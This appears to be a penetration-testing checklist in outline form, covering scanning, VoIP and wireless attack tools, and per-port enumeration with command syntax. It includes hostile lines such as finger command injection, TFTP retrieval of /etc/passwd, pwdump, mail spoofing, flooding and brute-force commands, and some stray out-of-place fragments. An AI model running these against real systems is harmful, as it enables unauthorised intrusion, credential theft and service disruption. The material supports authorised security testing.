
1. Back end files
1.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and then waits for a reply (or the lack of one). Disparate OSs respond differently to certain types of packet (the response is governed by an RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom packets may be sent to elicit these differences. Remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
2.1. Default Port Lists
2.1.1. Windows
2.1.2. *nix
2.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
2.2.1. General Enumeration Tools
2.2.1.1. nmap
2.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
2.2.1.2. netcat
2.2.1.2.1. nc -v -n IP_Address port
2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
2.2.1.3. amap
2.2.1.3.1. amap -bqv 192.168.1.1 80
2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
2.2.1.4. xprobe2
2.2.1.4.1. xprobe2 192.168.1.1
2.2.1.5. sinfp
2.2.1.5.1. ./sinfp.pl -i -p
2.2.1.6. nbtscan
2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
2.2.1.7. hping
2.2.1.7.1. hping ip_address
2.2.1.8. scanrand
2.2.1.8.1. scanrand ip_address:all
2.2.1.9. unicornscan
2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
2.2.1.10. netenum
2.2.1.10.1. netenum network/netmask timeout
2.2.1.11. fping
2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
2.2.2. Firewall Specific Tools
2.2.2.1. firewalk
2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
2.2.2.2. ftester
2.2.2.2.1. host 1: ./ftestd -i eth0 -v; host 2: ./ftest -f ftest.conf -v -d 0.01; then ./freport ftest.log ftestd.log
2.2.3. Default Passwords (Examine list)
2.2.3.1. Passwords A
2.2.3.2. Passwords B
2.2.3.3. Passwords C
2.2.3.4. Passwords D
2.2.3.5. Passwords E
2.2.3.6. Passwords F
2.2.3.7. Passwords G
2.2.3.8. Passwords H
2.2.3.9. Passwords I
2.2.3.10. Passwords J
2.2.3.11. Passwords K
2.2.3.12. Passwords L
2.2.3.13. Passwords M
2.2.3.14. Passwords N
2.2.3.15. Passwords O
2.2.3.16. Passwords P
2.2.3.17. Passwords R
2.2.3.18. Passwords S
2.2.3.19. Passwords T
2.2.3.20. Passwords U
2.2.3.21. Passwords V
2.2.3.22. Passwords W
2.2.3.23. Passwords X
2.2.3.24. Passwords Y
2.2.3.25. Passwords Z
2.2.3.26. Passwords (Numeric)
2.3. Active Hosts
2.3.1. Open TCP Ports
2.3.2. Closed TCP Ports
2.3.3. Open UDP Ports
2.3.4. Closed UDP Ports
2.3.5. Service Probing
2.3.5.1. SMTP Mail Bouncing
2.3.5.2. Banner Grabbing
2.3.5.2.1. Other
2.3.5.2.2. HTTP
2.3.5.2.3. HTTPS
2.3.5.2.4. SMTP
2.3.5.2.5. POP3
2.3.5.2.6. FTP
2.3.6. ICMP Responses
2.3.6.1. Type 3 (Port Unreachable)
2.3.6.2. Type 8 (Echo Request)
2.3.6.3. Type 13 (Timestamp Request)
2.3.6.4. Type 15 (Information Request)
2.3.6.5. Type 17 (Subnet Address Mask Request)
2.3.6.6. Responses from broadcast address
2.3.7. Source Port Scans
2.3.7.1. TCP/UDP 53 (DNS)
2.3.7.2. TCP 20 (FTP Data)
2.3.7.3. TCP 80 (HTTP)
2.3.7.4. TCP/UDP 88 (Kerberos)
2.3.8. Firewall Assessment
2.3.8.1. Firewalk
2.3.8.2. TCP/UDP/ICMP responses
2.3.9. OS Fingerprint
3. InitialProgram=c:\windows\system32\cmd.exe
4. Nabil contributed the AS/400 section.
5. VoIP Security
5.1. Sniffing Tools
5.1.1. AuthTool
5.1.2. Cain & Abel
5.1.3. Etherpeek
5.1.4. NetDude
5.1.5. Oreka
5.1.6. PSIPDump
5.1.7. SIPomatic
5.1.8. SIPv6 Analyzer
5.1.9. UCSniff
5.1.10. VoiPong
5.1.11. VOMIT
5.1.12. Wireshark
5.1.13. WIST - Web Interface for SIP Trace
5.2. Scanning and Enumeration Tools
5.2.1. enumIAX
5.2.2. fping
5.2.3. IAX Enumerator
5.2.4. iWar
5.2.5. Nessus
5.2.6. Nmap
5.2.7. SIP Forum Test Framework (SFTF)
5.2.8. SIPcrack
5.2.9. sipflanker
5.2.9.1. python sipflanker.py 192.168.1-254
5.2.10. SIP-Scan
5.2.11. SIP.Tastic
5.2.12. SIPVicious
5.2.13. SiVuS
5.2.14. SMAP
5.2.14.1. smap IP_Address/Subnet_Mask
5.2.14.2. smap -o IP_Address/Subnet_Mask
5.2.14.3. smap -l IP_Address
5.2.15. snmpwalk
5.2.16. VLANping
5.2.17. VoIPAudit
5.2.18. VoIP GHDB Entries
5.2.19. VoIP Voicemail Database
5.3. Packet Creation and Flooding Tools
5.3.1. H.323 Injection Files
5.3.2. H225regreject
5.3.3. IAXHangup
5.3.4. IAXAuthJack
5.3.5. IAX.Brute
5.3.6. IAXFlooder
5.3.6.1. ./iaxflood sourcename destinationname numpackets
5.3.7. INVITE Flooder
5.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
5.3.8. kphone-ddos
5.3.9. RTP Flooder
5.3.10. rtpbreak
5.3.11. Scapy
5.3.12. Seagull
5.3.13. SIPBomber
5.3.14. SIPNess
5.3.15. SIPp
5.3.16. SIPsak
5.3.16.1. Tracing paths: sipsak -T -s sip:username@domain
5.3.16.2. Options request: sipsak -vv -s sip:username@domain
5.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
5.3.17. SIP-Send-Fun
5.3.18. SIPVicious
5.3.19. Spitter
5.3.20. TFTP Brute Force
5.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
5.3.21. UDP Flooder
5.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
5.3.22. UDP Flooder (with VLAN Support)
5.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
5.3.23. Voiphopper
5.4. Fuzzing Tools
5.4.1. Asteroid
5.4.2. Codenomicon VoIP Fuzzers
5.4.3. Fuzzy Packet
5.4.4. Mu Security VoIP Fuzzing Platform
5.4.5. ohrwurm RTP Fuzzer
5.4.6. PROTOS H.323 Fuzzer
5.4.7. PROTOS SIP Fuzzer
5.4.8. SIP Forum Test Framework (SFTF)
5.4.9. Sip-Proxy
5.4.10. Spirent ThreatEx
5.5. Signaling Manipulation Tools
5.5.1. AuthTool
5.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
5.5.2. BYE Teardown
5.5.3. Check Sync Phone Rebooter
5.5.4. RedirectPoison
5.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
5.5.5. Registration Adder
5.5.6. Registration Eraser
5.5.7. Registration Hijacker
5.5.8. SIP-Kill
5.5.9. SIP-Proxy-Kill
5.5.10. SIP-RedirectRTP
5.5.11. SipRogue
5.5.12. vnak
5.6. Media Manipulation Tools
5.6.1. RTP InsertSound
5.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
5.6.2. RTP MixSound
5.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
5.6.3. RTPProxy
5.6.4. RTPInject
5.7. Generic Software Suites
5.7.1. OAT Office Communication Server Tool Assessment
5.7.2. EnableSecurity VOIPPACK
5.7.2.1. Note: add-on for Immunity Canvas
5.8. References
5.8.1. URLs
5.8.1.1. Common Vulnerabilities and Exposures (CVE)
5.8.1.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
5.8.1.2. Default Passwords
5.8.1.3. Hacking Exposed VoIP
5.8.1.3.1. Tool Pre-requisites
5.8.1.4. VoIPsa
5.8.2. White Papers
5.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
5.8.2.2. An Analysis of VoIP Security Threats and Tools
5.8.2.3. Hacking VoIP Exposed
5.8.2.4. Security testing of SIP implementations
5.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
5.8.2.6. Two attacks against VoIP
5.8.2.7. VoIP Attacks!
5.8.2.8. VoIP Security Audit Program (VSAP)
6. Wireless Penetration
6.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.
6.1.1. Site Map
6.1.1.1. RF Map
6.1.1.1.1. Lines of Sight
6.1.1.1.2. Signal Coverage
6.1.1.2. Physical Map
6.1.1.2.1. Triangulate APs
6.1.1.2.2. Satellite Imagery
6.1.2. Network Map
6.1.2.1. MAC Filter
6.1.2.1.1. Authorised MAC Addresses
6.1.2.1.2. Reaction to Spoofed MAC Addresses
6.1.2.2. Encryption Keys utilised
6.1.2.2.1. WEP
6.1.2.2.2. WPA/PSK
6.1.2.2.3. 802.1x
6.1.2.3. Access Points
6.1.2.3.1. ESSID
6.1.2.3.2. BSSIDs
6.1.2.4. Wireless Clients
6.1.2.4.1. MAC Addresses
6.1.2.4.2. Intercepted Traffic
6.2. Wireless Toolkit
6.2.1. Wireless Discovery
6.2.1.1. Aerosol
6.2.1.2. Airfart
6.2.1.3. Aphopper
6.2.1.4. Apradar
6.2.1.5. BAFFLE
6.2.1.6. inSSIDer
6.2.1.7. iWEPPro
6.2.1.8. karma
6.2.1.9. KisMAC-ng
6.2.1.10. Kismet
6.2.1.11. MiniStumbler
6.2.1.12. Netstumbler
6.2.1.13. Vistumbler
6.2.1.14. Wellenreiter
6.2.1.15. Wifi Hopper
6.2.1.16. WirelessMon
6.2.1.17. WiFiFoFum
6.2.2. Packet Capture
6.2.2.1. Airopeek
6.2.2.2. Airpcap
6.2.2.3. Airtraf
6.2.2.4. Apsniff
6.2.2.5. Cain
6.2.2.6. Commview
6.2.2.7. Ettercap
6.2.2.8. Netmon
6.2.2.8.1. nmwifi
6.2.2.9. Wireshark
6.2.3. EAP Attack tools
6.2.3.1. eapmd5pass
6.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
6.2.4. Leap Attack Tools
6.2.4.1. asleap
6.2.4.2. thc leap cracker
6.2.4.3. anwrap
6.2.5. WEP/ WPA Password Attack Tools
6.2.5.1. Airbase
6.2.5.2. Aircrack-ptw
6.2.5.3. Aircrack-ng
6.2.5.4. Airsnort
6.2.5.5. cowpatty
6.2.5.6. FiOS Wireless Key Calculator
6.2.5.7. iWifiHack
6.2.5.8. KisMAC-ng
6.2.5.9. Rainbow Tables
6.2.5.10. wep attack
6.2.5.11. wep crack
6.2.5.12. wzcook
6.2.6. Frame Generation Software
6.2.6.1. Airgobbler
6.2.6.2. airpwn
6.2.6.3. Airsnarf
6.2.6.4. Commview
6.2.6.5. fake ap
6.2.6.6. void 11
6.2.6.7. wifi tap
6.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
6.2.6.8. FreeRADIUS - Wireless Pwnage Edition
6.2.7. Mapping Software
6.2.7.1. Online Mapping
6.2.7.1.1. WIGLE
6.2.7.1.2. Skyhook
6.2.7.2. Tools
6.2.7.2.1. Knsgem
6.2.8. File Format Conversion Tools
6.2.8.1. ns1 recovery and conversion tool
6.2.8.2. warbable
6.2.8.3. warkizniz
6.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
6.2.8.4. ivstools
6.2.9. IDS Tools
6.2.9.1. WIDZ
6.2.9.2. War Scanner
6.2.9.3. Snort-Wireless
6.2.9.4. AirDefense
6.2.9.5. AirMagnet
6.3. WLAN discovery
6.3.1. Unencrypted WLAN
6.3.1.1. Visible SSID
6.3.1.1.1. Sniff for IP range
6.3.1.2. Hidden SSID
6.3.1.2.1. Deauth client
6.3.2. WEP encrypted WLAN
6.3.2.1. Visible SSID
6.3.2.1.1. WEPattack
6.3.2.2. Hidden SSID
6.3.2.2.1. Deauth client
6.3.3. WPA / WPA2 encrypted WLAN
6.3.3.1. Deauth client
6.3.3.1.1. Capture EAPOL handshake
6.3.4. LEAP encrypted WLAN
6.3.4.1. Deauth client
6.3.4.1.1. Break LEAP
6.3.5. 802.1x WLAN
6.3.5.1. Create Rogue Access Point
6.3.5.1.1. Airsnarf
6.3.5.1.2. fake ap
6.3.5.1.3. Hotspotter
6.3.5.1.4. Karma
6.3.5.1.5. Linux rogue AP
6.3.6. Resources
6.3.6.1. URLs
6.3.6.1.1. Wirelessdefence.org
6.3.6.1.2. Russix
6.3.6.1.3. Wardrive.net
6.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
6.3.6.2. White Papers
6.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
6.3.6.2.2. 802.11b Firmware-Level Attacks
6.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
6.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
6.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
6.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
6.3.6.2.7. Active behavioral fingerprinting of wireless devices
6.3.6.3. Common Vulnerabilities and Exposures (CVE)
6.3.6.3.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
7. Pre-Inspection Visit - template
8. pwdump [-h][-o][-u][-p] machineName
9. Client Side Security
10. Set objShell = CreateObject("WScript.Shell")
11. Check visible areas for sensitive information.
12. Enumeration
12.1. Daytime port 13 open
12.1.1. nmap nse script
12.1.1.1. daytime
12.2. FTP port 21 open
12.2.1. Fingerprint server
12.2.1.1. telnet ip_address 21 (Banner grab)
12.2.1.2. Run command ftp ip_address
12.2.1.3. ftp@example.com
12.2.1.4. Check for anonymous access
12.2.1.4.1. ftp ip_address; Username: anonymous OR anon; Password: any@email.com
12.2.2. Password guessing
12.2.2.1. Hydra brute force
12.2.2.2. medusa
12.2.2.3. Brutus
12.2.3. Examine configuration files
12.2.3.1. ftpusers
12.2.3.2. ftp.conf
12.2.3.3. proftpd.conf
12.2.4. MiTM
12.2.4.1. pasvagg.pl
12.3. SSH port 22 open
12.3.1. Fingerprint server
12.3.1.1. telnet ip_address 22 (banner grab)
12.3.1.2. scanssh
12.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
12.3.2. Password guessing
12.3.2.1. ssh root@ip_address
12.3.2.2. guess-who
12.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
12.3.2.3. Hydra brute force
12.3.2.4. brutessh
12.3.2.5. Ruby SSH Bruteforcer
12.3.3. Examine configuration files
12.3.3.1. ssh_config
12.3.3.2. sshd_config
12.3.3.3. authorized_keys
12.3.3.4. ssh_known_hosts
12.3.3.5. .shosts
12.3.4. SSH Client programs
12.3.4.1. tunnelier
12.3.4.2. winsshd
12.3.4.3. putty
12.3.4.4. winscp
12.4. Telnet port 23 open
12.4.1. Fingerprint server
12.4.1.1. telnet ip_address
12.4.1.1.1. Common Banner List (OS: Banner)
12.4.1.1.1.1. Solaris 8: SunOS 5.8
12.4.1.1.1.2. Solaris 2.6: SunOS 5.6
12.4.1.1.1.3. Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)
12.4.1.1.1.4. SunOS 4.1.x: SunOS Unix (hostname)
12.4.1.1.1.5. FreeBSD: FreeBSD/i386 (hostname) (ttyp1)
12.4.1.1.1.6. NetBSD: NetBSD/i386 (hostname) (ttyp1)
12.4.1.1.1.7. OpenBSD: OpenBSD/i386 (hostname) (ttyp1)
12.4.1.1.1.8. Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)
12.4.1.1.1.9. Debian 3.0: Debian GNU/Linux 3.0 / hostname
12.4.1.1.1.10. SGI IRIX 6.x: IRIX (hostname)
12.4.1.1.1.11. IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
12.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
12.4.1.1.1.13. Nokia IPSO: IPSO (hostname) (ttyp0)
12.4.1.1.1.14. Cisco IOS: User Access Verification
12.4.1.1.1.15. Livingston ComOS: ComOS - Livingston PortMaster
12.4.1.2. telnetfp
12.4.2. Password Attack
12.4.2.2. Hydra brute force
12.4.2.3. Brutus
12.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
12.4.3. Examine configuration files
12.4.3.1. /etc/inetd.conf
12.4.3.2. /etc/xinetd.d/telnet
12.4.3.3. /etc/xinetd.d/stelnet
12.5. Sendmail Port 25 open
12.5.1. Fingerprint server
12.5.1.1. telnet ip_address 25 (banner grab)
12.5.2. Mail Server Testing
12.5.2.1. Enumerate users
12.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
12.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
12.5.2.2. Mail Spoof Test
12.5.2.2.1. HELO anything
12.5.2.2.2. MAIL FROM: spoofed_address
12.5.2.2.3. RCPT TO: valid_mail_account
12.5.2.2.4. DATA
12.5.2.2.5. .
12.5.2.2.6. QUIT
12.5.2.3. Mail Relay Test
12.5.3. Examine Configuration Files
12.5.3.1. sendmail.cf
12.5.3.2. submit.cf
12.6. DNS port 53 open
12.6.1. Fingerprint server/ service
12.6.1.1. host
12.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
12.6.1.1.1.1. -v verbose format
12.6.1.1.1.2. -t (query type) allows a user to specify a record type, i.e. A, NS, or PTR
12.6.1.1.1.3. -a same as -t ANY
12.6.1.1.1.4. -l zone transfer (if allowed)
12.6.1.1.1.5. -f save to a specified filename
12.6.1.2. nslookup
12.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
12.6.1.3. dig
12.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
12.6.1.4. whois
12.6.1.4.1. -h Use the named host to resolve the query
12.6.1.4.2. -a Use ARIN to resolve the query
12.6.1.4.3. -r Use RIPE to resolve the query
12.6.1.4.4. -p Use APNIC to resolve the query
12.6.1.4.5. -Q Perform a quick lookup
12.6.2. DNS Enumeration
12.6.2.1. Bile Suite
12.6.2.1.1. perl BiLE.pl [website] [project_name]
12.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
12.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
12.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
12.6.2.1.5. perl exp-tld.pl [input file] [output file]
12.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
12.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
12.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
12.6.2.2. txdns
12.6.2.2.1. txdns -rt -t domain_name
12.6.2.2.2. txdns -x 50 -bb domain_name
12.6.2.3. nmap nse scripts
12.6.2.3.1. dns-random-srcport
12.6.2.3.2. dns-random-txid
12.6.2.3.3. dns-recursion
12.6.2.3.4. dns-zone-transfer
12.6.3. Examine Configuration Files
12.6.3.1. host.conf
12.6.3.2. resolv.conf
12.6.3.3. named.conf
12.7. TFTP port 69 open
12.7.1. TFTP Enumeration
12.7.1.1. tftp ip_address PUT local_file
12.7.1.2. tftp ip_address GET conf.txt (or other files)
12.7.1.3. Solarwinds TFTP server
12.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)
12.7.2. TFTP Bruteforcing
12.7.2.1. TFTP bruteforcer
12.7.2.2. Cisco-Torch
12.8. Finger Port 79 open
12.8.1. User enumeration
12.8.1.1. finger 'a b c d e f g h' @example.com
12.8.1.2. finger admin@example.com
12.8.1.3. finger user@example.com
12.8.1.4. finger 0@example.com
12.8.1.5. finger .@example.com
12.8.1.6. finger **@example.com
12.8.1.7. finger test@example.com
12.8.1.8. finger @example.com
12.8.1.9. nmap nse script
12.8.1.9.1. finger
12.8.2. Command execution
12.8.2.1. finger "|/bin/id@example.com"
12.8.2.2. finger "|/bin/ls -a /@example.com"
12.8.3. Finger Bounce
12.8.3.1. finger user@host@victim
12.8.3.2. finger @internal@external
12.9. Web Ports 80,8080 etc. open
12.9.1. Fingerprint server
12.9.1.1. Telnet ip_address port
12.9.1.2. Firefox plugins
12.9.1.2.1. All
12.9.1.2.2. Specific
12.9.2. Crawl website
12.9.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)
12.9.2.2. httprint
12.9.2.3. Metagoofil
12.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
12.9.3. Web Directory enumeration
12.9.3.1. Nikto
12.9.3.1.1. nikto [-h target] [options]
12.9.3.2. DirBuster
12.9.3.3. Wikto
12.9.3.4. Goolag Scanner
12.9.4. Vulnerability Assessment
12.9.4.1. Manual Tests
12.9.4.1.1. Default Passwords
12.9.4.1.2. Install Backdoors
12.9.4.1.3. Method Testing
12.9.4.1.4. Upload Files
12.9.4.1.5. View Page Source
12.9.4.1.6. Input Validation Checks
12.9.4.1.7. Automated table and column iteration
12.9.4.2. Vulnerability Scanners
12.9.4.2.1. Acunetix
12.9.4.2.2. Grendelscan
12.9.4.2.3. NStealth
12.9.4.2.4. Obiwan III
12.9.4.2.5. w3af
12.9.4.3. Specific Applications/ Server Tools
12.9.4.3.1. Domino
12.9.4.3.2. Joomla
12.9.4.3.3. aspaudit.pl
12.9.4.3.4. Vbulletin
12.9.4.3.5. ZyXel
12.9.5. Proxy Testing
12.9.5.1. Burpsuite
12.9.5.2. Crowbar
12.9.5.3. Interceptor
12.9.5.4. Paros
12.9.5.5. Requester Raw
12.9.5.6. Suru
12.9.5.7. WebScarab
12.9.6. Examine configuration files
12.9.6.1. Generic
12.9.6.1.1. Examine httpd.conf/ windows config files
12.9.6.2. JBoss
12.9.6.2.1. JMX Console: http://<IP>:8080/jmx-console/
12.9.6.3. Joomla
12.9.6.3.1. configuration.php
12.9.6.3.2. diagnostics.php
12.9.6.3.3. joomla.inc.php
12.9.6.3.4. config.inc.php
12.9.6.4. Mambo
12.9.6.4.1. configuration.php
12.9.6.4.2. config.inc.php
12.9.6.5. Wordpress
12.9.6.5.1. setup-config.php
12.9.6.5.2. wp-config.php
12.9.6.6. ZyXel
12.9.6.6.1. /WAN.html (contains PPPoE ISP password)
12.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
12.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
12.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
12.9.6.6.5. /CF_Keyword.html (Content Filter)
12.9.6.6.6. /RemMagWWW.html (Remote MGMT)
12.9.6.6.7. /rpSysAdmin.html (System)
12.9.6.6.8. /LAN_IP.html (LAN)
12.9.6.6.9. /NAT_General.html (NAT)
12.9.6.6.10. /ViewLog.html (Logs)
12.9.6.6.11. /rpFWUpload.html (Tools)
12.9.6.6.12. /DiagGeneral.html (Diagnostic)
12.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
12.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
12.9.6.6.15. Config Backups
12.9.7. Examine web server logs
12.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
12.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq
12.9.8. References
12.9.8.1. White Papers
12.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
12.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
12.9.8.1.3. Blind Security Testing - An Evolutionary Approach
12.9.8.1.4. Command Injection in XML Signatures and Encryption
12.9.8.1.5. Input Validation Cheat Sheet
12.9.8.1.6. SQL Injection Cheat Sheet
12.9.8.2. Books
12.9.8.2.1. Hacking Exposed Web 2.0
12.9.8.2.2. Hacking Exposed Web Applications
12.9.8.2.3. The Web Application Hacker's Handbook
12.9.9. Exploit Frameworks
12.9.9.1. Brute-force Tools
12.9.9.1.1. Acunetix
12.9.9.2. Metasploit
12.9.9.3. w3af
12.10. Portmapper port 111 open
12.10.1. rpcdump.py
12.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
12.10.2. rpcinfo
12.10.2.1. rpcinfo [options] IP_Address
12.11. NTP Port 123 open
12.11.1. NTP Enumeration
12.11.1.1. ntpdc -c monlist IP_ADDRESS
12.11.1.2. ntpdc -c sysinfo IP_ADDRESS
12.11.1.3. ntpq
12.11.1.3.1. host
12.11.1.3.2. hostname
12.11.1.3.3. ntpversion
12.11.1.3.4. readlist
12.11.1.3.5. version
12.11.2. Examine configuration files
12.11.2.1. ntp.conf
12.11.3. nmap nse script
12.11.3.1. ntp-info
12.12. NetBIOS Ports 135-139,445 open
12.12.1. NetBIOS enumeration
12.12.1.1. Enum
12.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
12.12.1.2. Null Session
12.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
12.12.1.3. Smbclient
12.12.1.3.1. smbclient -L //server/share password options
12.12.1.4. Superscan
12.12.1.4.1. Enumeration tab.
12.12.1.5. user2sid/sid2user
12.12.1.6. Winfo
12.12.2. NetBIOS brute force
12.12.2.1. Hydra
12.12.2.2. Brutus
12.12.2.3. Cain & Abel
12.12.2.4. getacct
12.12.2.5. NAT (NetBIOS Auditing Tool)
12.12.3. Examine Configuration Files
12.12.3.1. Smb.conf
12.12.3.2. lmhosts
12.13. SNMP port 161 open
12.13.1. Default Community Strings
12.13.1.1. public
12.13.1.2. private
12.13.1.3. cisco
12.13.1.3.1. cable-docsis
12.13.1.3.2. ILMI
12.13.2. MIB enumeration
12.13.2.1. Windows NT
12.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
12.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
12.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
12.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
12.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
12.13.2.2. Solarwinds MIB walk
12.13.2.3. Getif
12.13.2.4. snmpwalk
12.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
12.13.2.5. Snscan
12.13.2.6. Applications
12.13.2.6.1. ZyXel
12.13.2.7. nmap nse script
12.13.2.7.1. snmp-sysdescr
12.13.3. SNMP Bruteforce
12.13.3.1. onesixtyone
12.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>
12.13.3.2. cat
12.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
12.13.3.3. Solarwinds SNMP Brute Force
12.13.3.4. ADMsnmp
12.13.3.5. nmap nse script
12.13.3.5.1. snmp-brute
12.13.4. Examine SNMP Configuration files
12.13.4.1. snmp.conf
12.13.4.2. snmpd.conf
12.13.4.3. snmp-config.xml
12.14. LDAP Port 389 Open
12.14.1. ldap enumeration
12.14.1.1. ldapminer
12.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
12.14.1.2. luma
12.14.1.2.1. Gui based tool
12.14.1.3. ldp
12.14.1.3.1. Gui based tool
12.14.1.4. openldap
12.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
12.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
